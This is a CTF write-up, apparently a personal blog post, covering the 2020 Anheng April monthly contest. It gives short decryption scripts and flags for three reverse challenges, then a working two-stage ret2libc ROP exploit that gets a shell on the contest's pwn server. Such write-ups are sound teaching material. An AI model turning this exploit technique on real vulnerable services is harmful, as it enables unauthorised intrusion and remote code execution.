0x02 - Notes on the 2020 Anheng (安恒) April monthly CTF
- Re: the easy ones are really easy, the hard ones are really hard
- fell asleep halfway through
Re - 入门reverse (intro reverse)
- A freebie: the flag is right in your face
```python
# Each flag character was stored as (c ^ 6) + 1; undo that character by character
str1 = "akhb~chdaZrdaZudqduvdZvvv|"
flag = ''
for i in str1:
    flag += chr((ord(i) - 1) ^ 6)
print(flag)
```
- flag{daef_wef_reverse_sss}
Re - encrypt3
- Being lazy, I didn't analyze it carefully and just brute-forced the flag
```python
# The ciphertext is a single-byte XOR; try all 128 candidate keys and keep the one
# whose output contains the flag prefix
enc1 = [38, 44, 33, 39, 59, 35, 34, 115, 117, 114, 113, 33, 36, 117, 118, 119, 35, 120, 38,
        114, 117, 113, 38, 34, 113, 114, 117, 114, 36, 112, 115, 118, 121, 112, 35, 37, 121, 61]
for i in range(128):
    flag = ''
    for j in enc1:
        flag += chr(j ^ i)
    if 'flag{' in flag:
        print(flag)
```
- flag{cb3521ad567c8f251fb1252d03690ce9}
Re - sm
- I knew it was SM encryption and guessed SM4, but spent ages looking for a tool and couldn't find one
- then I <del>fell asleep</del> went off to do something else
- After the contest ended I saw a decryption library that another player had written
- From the program, the key is guessed to be 0x0123456789ABCDEFFEDCBA9876543210
- The ciphertext is 0xC079776677E5AC9931C567EB470645A7
- After installing the library, try decrypting to get the flag
```python
import pysm4

key = 0x0123456789ABCDEFFEDCBA9876543210
cipher = 0xC079776677E5AC9931C567EB470645A7
# pysm4.decrypt works on 128-bit integers; the decrypted block, written as
# 32 hex digits (leading zeros kept), is the flag body
dec = pysm4.decrypt(cipher, key)
print('%032x' % dec)
```
- flag{d0389046c236e4c66bd787959f5c6e66}
Pwn - echo server
- A simple stack overflow; the one thing to watch for is that the stack pointer has to be pivoted into the .bss segment (via the overwritten saved rbp)
```python
from pwn import *
from LibcSearcher import LibcSearcher

# io = process('./test')
io = remote('183.129.189.60', 10061)
elf = ELF('./test')

buf_len = 0x80
# Overwritten saved rbp: point it into .bss so that, after leave; ret, any
# rbp-relative accesses in the code we return into hit writable memory
fakeebp = p64(elf.bss() + 0x500)
start_addr = 0x00000000004005C0     # _start, used to restart the program after the leak
pop_rdi_addr = 0x0000000000400823   # pop rdi; ret
retn_addr = 0x0000000000400824      # ret (keeps the stack 16-byte aligned before system)
call_printf = 0x4006EE              # address in ./test that calls printf (from the original script)

# Stage 1: print the GOT entry of printf to leak its libc address, then return to _start
payload = b'\0' * buf_len + fakeebp + p64(pop_rdi_addr) + \
    p64(elf.got['printf']) + p64(call_printf) + p64(start_addr)
io.sendline(b'2333')
io.sendline(payload)
io.recvuntil(b'hello ')
printf_libc_addr = u64(io.recv(6).ljust(8, b'\x00'))  # a libc pointer has 6 significant bytes

libc = LibcSearcher('printf', printf_libc_addr)
libc_base = printf_libc_addr - libc.dump('printf')
system_libc_addr = libc_base + libc.dump('system')
bin_sh_libc_addr = libc_base + libc.dump('str_bin_sh')

# Stage 2: same overflow again, this time calling system("/bin/sh")
payload = b'\0' * buf_len + fakeebp + p64(retn_addr) + p64(pop_rdi_addr) + \
    p64(bin_sh_libc_addr) + p64(system_libc_addr) + p64(start_addr)
io.sendline(b'2333')
io.sendline(payload)
io.interactive()
```